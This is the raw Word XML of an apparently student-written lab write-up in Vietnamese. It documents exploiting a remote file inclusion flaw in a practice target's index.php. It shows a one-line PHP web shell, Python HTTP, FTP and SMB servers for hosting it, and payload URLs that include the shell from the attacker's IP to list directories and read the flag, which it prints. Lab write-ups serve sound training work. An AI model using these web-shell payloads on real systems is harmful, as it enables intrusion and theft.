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6301E" w14:textId="1B447740" w:rsidR="00642D13" w:rsidRDefault="00D01252" w:rsidP="00D01252">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D01252">
        <w:t>Attack the target, gain command execution by exploiting the RFI vulnerability, and then look for the flag under one of the directories in /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F61313C" w14:textId="08041EB8" w:rsidR="00D01252" w:rsidRDefault="00D01252" w:rsidP="00D01252">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="292FC698" w14:textId="1715E6CD" w:rsidR="00D01252" w:rsidRDefault="00D01252" w:rsidP="00D01252">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kiểm tra xem có thể sử dụng RFI không bằng cách include 1 url cục bộ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B8F66" w14:textId="2D43870C" w:rsidR="00D01252" w:rsidRDefault="00D01252" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB467C5" w14:textId="59C7F170" w:rsidR="00D01252" w:rsidRDefault="00CA6CBD" w:rsidP="00D01252">
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00D01252" w:rsidRPr="00D01252">
        <w:t>index.php?language=</w:t>
      </w:r>
      <w:r w:rsidR="00D01252">
        <w:t xml:space="preserve">http://127.0.0.1:80/index.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353CF6EE" w14:textId="295FFABD" w:rsidR="00D01252" w:rsidRDefault="00D01252" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F96AD" w14:textId="674ECA52" w:rsidR="00CA6CBD" w:rsidRDefault="00CA6CBD" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54B48F4B" wp14:editId="48A81E10">
            <wp:extent cx="5943600" cy="4159250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1790700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02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A8C0" w14:textId="0BB56DEF" w:rsidR="00CA6CBD" w:rsidRDefault="00CA6CBD" w:rsidP="00D01252">
      <w:r>
        <w:t>Include url cục bộ thành công -&gt; Tồn tại lỗ hổng RFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3828A72A" w14:textId="3C7487D3" w:rsidR="00C64047" w:rsidRDefault="00C64047" w:rsidP="00D01252">
      <w:r>
        <w:t>Khởi tạo một Webshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497D2A42" w14:textId="7869BF57" w:rsidR="00C64047" w:rsidRDefault="00C64047" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F93AC6C" w14:textId="0C0E8B65" w:rsidR="00C64047" w:rsidRDefault="00C64047" w:rsidP="00D01252">
      <w:r w:rsidRPr="00C64047">
        <w:t>echo '&lt;?php system($_GET["cmd"])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C64047">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C64047">
        <w:t>&gt;' &gt; WebShell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD9D82" w14:textId="12B35848" w:rsidR="00C64047" w:rsidRDefault="00C64047" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A71D0FB" w14:textId="7F9984BE" w:rsidR="00FA3F3E" w:rsidRDefault="00FA3F3E" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F86618A" wp14:editId="3F5C0A5D">
            <wp:extent cx="5934075" cy="1466850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="142325032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0320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B525" w14:textId="0FDA9F82" w:rsidR="00FA3F3E" w:rsidRPr="000322D0" w:rsidRDefault="00FA3F3E" w:rsidP="00D01252">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000322D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Khởi tạo một http server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A03F6" w14:textId="120A1E9F" w:rsidR="006B73BB" w:rsidRDefault="006B73BB" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DB9612" w14:textId="4BE6EBD6" w:rsidR="006B73BB" w:rsidRDefault="006B73BB" w:rsidP="00D01252">
      <w:r w:rsidRPr="006B73BB">
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B73BB">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B73BB">
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C833A8E" w14:textId="587192BA" w:rsidR="006B73BB" w:rsidRDefault="006B73BB" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0F4B6" w14:textId="1D6D61D5" w:rsidR="006B73BB" w:rsidRDefault="006B73BB" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="084EE2C0" wp14:editId="43363A56">
            <wp:extent cx="5562600" cy="1085850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89099893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98937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3E67" w14:textId="77777777" w:rsidR="00F47C69" w:rsidRDefault="00F47C69" w:rsidP="00D01252"/>
    <w:p w14:paraId="7F2B3017" w14:textId="5F75A500" w:rsidR="00F47C69" w:rsidRDefault="00F47C69" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F6DD9" w14:textId="39A58029" w:rsidR="00F47C69" w:rsidRDefault="00F47C69" w:rsidP="00D01252">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="001216FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.129.29.114/index.php?language=http://10.10.14.204:80/WebShell.php&amp;cmd=ls+-l+/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="330B84C5" w14:textId="3369B45D" w:rsidR="00F47C69" w:rsidRDefault="00F47C69" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9F5DEF" w14:textId="77777777" w:rsidR="00C26190" w:rsidRDefault="00C26190" w:rsidP="00D01252"/>
    <w:p w14:paraId="06ED1E19" w14:textId="021EC090" w:rsidR="007E0A9D" w:rsidRDefault="007E0A9D" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70CE0E74" wp14:editId="06FDDDA7">
            <wp:extent cx="5943600" cy="3140075"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="178088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15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7F7E" w14:textId="70FF42E7" w:rsidR="007E0A9D" w:rsidRDefault="007E0A9D" w:rsidP="00D01252">
      <w:r>
        <w:t>Ta liệt kê các file và thư mục trong đường dẫn /exercise</w:t>
      </w:r>
      <w:r w:rsidR="000D482F">
        <w:t xml:space="preserve"> thì thấy file flag là flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F48A3D1" w14:textId="108368E3" w:rsidR="007E0A9D" w:rsidRDefault="007E0A9D" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A610DD" w14:textId="6BAE4CEF" w:rsidR="007E0A9D" w:rsidRDefault="007E0A9D" w:rsidP="00D01252">
      <w:r w:rsidRPr="007E0A9D">
        <w:t>/index.php?language=http://10.10.14.204:80/WebShell.php&amp;cmd=ls+-l+/exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F3CC3E" w14:textId="6D5928E9" w:rsidR="007E0A9D" w:rsidRDefault="007E0A9D" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E78A3A0" w14:textId="0FEB3E45" w:rsidR="000D482F" w:rsidRDefault="000D482F" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EC0A96B" wp14:editId="14860092">
            <wp:extent cx="5943600" cy="2553970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1536619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198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644A" w14:textId="78BD1FB6" w:rsidR="000D482F" w:rsidRDefault="000D482F" w:rsidP="00D01252">
      <w:r>
        <w:t>Đọc file flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B7F278" w14:textId="0258FC56" w:rsidR="002968B1" w:rsidRDefault="002968B1" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C76CBF8" w14:textId="241F4DF1" w:rsidR="002968B1" w:rsidRDefault="002968B1" w:rsidP="00D01252">
      <w:r w:rsidRPr="002968B1">
        <w:t>/index.php?language=http://10.10.14.204:80/WebShell.php&amp;cmd=cat+/exercise/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD3BFD0" w14:textId="6C120552" w:rsidR="002968B1" w:rsidRDefault="002968B1" w:rsidP="00D01252">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7A154" w14:textId="110381BC" w:rsidR="000D482F" w:rsidRDefault="002968B1" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E94CC35" wp14:editId="5F853A45">
            <wp:extent cx="5943600" cy="3317875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="308296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962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7B8B" w14:textId="7272FD9A" w:rsidR="00F56954" w:rsidRDefault="00F56954" w:rsidP="00D01252">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56954">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56954">
        <w:t>99a8fc05f033f2fc0cf9a6f9826f83f4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7704A5" w14:textId="6088D923" w:rsidR="004C6248" w:rsidRDefault="004C6248" w:rsidP="00D01252">
      <w:r>
        <w:t>Tiếp tục thử include các server ftp và smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4E3A50" w14:textId="2CA5FA4C" w:rsidR="00F051FE" w:rsidRDefault="00F051FE" w:rsidP="00D01252">
      <w:r>
        <w:t>Setup pyftpdlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B56DC6" w14:textId="7E991F00" w:rsidR="00F051FE" w:rsidRDefault="00F051FE" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707C8D1D" w14:textId="02B56032" w:rsidR="00F051FE" w:rsidRDefault="00F051FE" w:rsidP="00D01252">
      <w:r w:rsidRPr="00F051FE">
        <w:t>pip3 install pyftpdlib --break-system-packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19379030" w14:textId="584DEB4C" w:rsidR="00F051FE" w:rsidRDefault="00F051FE" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18880C0B" w14:textId="04240D7A" w:rsidR="006F41C6" w:rsidRDefault="006F41C6" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7625ABF4" wp14:editId="26393ABC">
            <wp:extent cx="5943600" cy="1082675"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="4491816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1649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36F0" w14:textId="3CEB7DBD" w:rsidR="008E1772" w:rsidRPr="000322D0" w:rsidRDefault="008E1772" w:rsidP="00D01252">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000322D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Khởi tạo server ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070AB55A" w14:textId="6D20953E" w:rsidR="008E1772" w:rsidRDefault="008E1772" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263B8E1E" w14:textId="194BC150" w:rsidR="008E1772" w:rsidRDefault="008E1772" w:rsidP="00D01252">
      <w:r w:rsidRPr="008E1772">
        <w:t>python3 -m pyftpdlib -p 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4749BA" w14:textId="1C53DCAE" w:rsidR="008E1772" w:rsidRDefault="008E1772" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A572F3" w14:textId="11371F46" w:rsidR="008E1772" w:rsidRDefault="005B1C79" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AB77B7A" wp14:editId="4A06965F">
            <wp:extent cx="5943600" cy="1313815"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1879645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4508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8118" w14:textId="29244E5B" w:rsidR="00C26190" w:rsidRDefault="00C26190" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF18EB" w14:textId="05C0D605" w:rsidR="00C26190" w:rsidRDefault="00C26190" w:rsidP="00D01252">
      <w:r w:rsidRPr="00C26190">
        <w:t>/index.php?language=ftp://10.10.16.7:21/WebShell.php&amp;cmd=ls+-l+/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F28A5" w14:textId="76E3D3A6" w:rsidR="00C26190" w:rsidRDefault="00C26190" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF46F35" w14:textId="315F7225" w:rsidR="00C26190" w:rsidRDefault="00C26190" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35AAD114" wp14:editId="4AE10B53">
            <wp:extent cx="5943600" cy="4159250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112100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085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3278" w14:textId="77777777" w:rsidR="0023208C" w:rsidRDefault="0023208C" w:rsidP="00D01252"/>
    <w:p w14:paraId="3DD526B4" w14:textId="2F970AA2" w:rsidR="0023208C" w:rsidRDefault="0023208C" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8BA974" w14:textId="6B0E8EE6" w:rsidR="0023208C" w:rsidRDefault="0023208C" w:rsidP="00D01252">
      <w:r w:rsidRPr="0023208C">
        <w:t>/index.php?language=ftp://10.10.16.7:21/WebShell.php&amp;cmd=cat+/exercise/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B19916" w14:textId="1CACD418" w:rsidR="0023208C" w:rsidRDefault="0023208C" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9414C8" w14:textId="05467A96" w:rsidR="0023208C" w:rsidRDefault="0023208C" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BD97433" wp14:editId="1872B62C">
            <wp:extent cx="5943600" cy="3301365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1783598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982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B6F3" w14:textId="77777777" w:rsidR="000322D0" w:rsidRDefault="000322D0" w:rsidP="00D01252"/>
    <w:p w14:paraId="7532D1A0" w14:textId="083BFBA3" w:rsidR="000322D0" w:rsidRDefault="000322D0" w:rsidP="00D01252">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000322D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Khởi tạo server smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F46A568" w14:textId="77548999" w:rsidR="000322D0" w:rsidRDefault="000322D0" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A782266" w14:textId="1E26B90D" w:rsidR="000322D0" w:rsidRDefault="000322D0" w:rsidP="00D01252">
      <w:r w:rsidRPr="000322D0">
        <w:t>impacket-smbserver -smb2support share $(pwd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6926213F" w14:textId="0E67A912" w:rsidR="000322D0" w:rsidRDefault="000322D0" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25235EF3" w14:textId="6B153D16" w:rsidR="000322D0" w:rsidRDefault="000322D0" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28D5617D" wp14:editId="61DE414B">
            <wp:extent cx="5943600" cy="1791335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107004737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377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5C5C" w14:textId="2D6353AD" w:rsidR="000322D0" w:rsidRDefault="000322D0" w:rsidP="00D01252">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F36A26F" w14:textId="517183EE" w:rsidR="00843CEB" w:rsidRDefault="000322D0" w:rsidP="00D01252">
      <w:r w:rsidRPr="000322D0">
        <w:t>index.php?language=\\10.10.16.7\share\WebShell.php&amp;cmd=cat+/exercise/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F236946" w14:textId="307B767C" w:rsidR="000322D0" w:rsidRDefault="000322D0" w:rsidP="00D01252">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353B1B46" w14:textId="0913A2E9" w:rsidR="00843CEB" w:rsidRDefault="00843CEB" w:rsidP="00D01252"/>
    <w:p w14:paraId="42AEAA72" w14:textId="59C9EB80" w:rsidR="001341E7" w:rsidRDefault="001341E7" w:rsidP="00D01252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="325C81F1" wp14:editId="16C16526">
            <wp:extent cx="5943600" cy="3195955"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="173776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696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CA92" w14:textId="01CF1F25" w:rsidR="001341E7" w:rsidRPr="000322D0" w:rsidRDefault="001341E7" w:rsidP="00D01252">
      <w:r>
        <w:t>Không RFI với server smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF8EAB" w14:textId="77777777" w:rsidR="000322D0" w:rsidRDefault="000322D0" w:rsidP="00D01252"/>
    <w:p w14:paraId="2AB49EA0" w14:textId="77777777" w:rsidR="000322D0" w:rsidRDefault="000322D0" w:rsidP="00D01252"/>
    <w:p w14:paraId="442DC07F" w14:textId="77777777" w:rsidR="00D01252" w:rsidRDefault="00D01252" w:rsidP="00D01252"/>
    <w:sectPr w:rsidR="00D01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5A2137"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3240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652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D13"/>
    <w:rsid w:val="000322D0"/>
    <w:rsid w:val="000D482F"/>
    <w:rsid w:val="001341E7"/>
    <w:rsid w:val="0023208C"/>
    <w:rsid w:val="002968B1"/>
    <w:rsid w:val="0044208E"/>
    <w:rsid w:val="004C6248"/>
    <w:rsid w:val="005B1C79"/>
    <w:rsid w:val="00642D13"/>
    <w:rsid w:val="006B73BB"/>
    <w:rsid w:val="006F41C6"/>
    <w:rsid w:val="007E0A9D"/>
    <w:rsid w:val="00843CEB"/>
    <w:rsid w:val="008E1772"/>
    <w:rsid w:val="00C26190"/>
    <w:rsid w:val="00C64047"/>
    <w:rsid w:val="00CA6CBD"/>
    <w:rsid w:val="00D01252"/>
    <w:rsid w:val="00EF1296"/>
    <w:rsid w:val="00F051FE"/>
    <w:rsid w:val="00F47C69"/>
    <w:rsid w:val="00F56954"/>
    <w:rsid w:val="00FA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1E319"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F6150561-4C72-41E7-A322-16454167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D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D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2D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2D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2D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2D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2D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2D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2D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D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D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2D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2D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2D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2D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2D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2D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2D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2D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2D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2D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2D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2D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2D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2D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2D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2D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2D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2D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012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C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29.29.114/index.php?language=http://10.10.14.204:80/WebShell.php&amp;cmd=ls+-l+/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Quoc Khanh D21AT03</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ly Quoc Khanh D21AT03</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-02T04:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-02T05:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>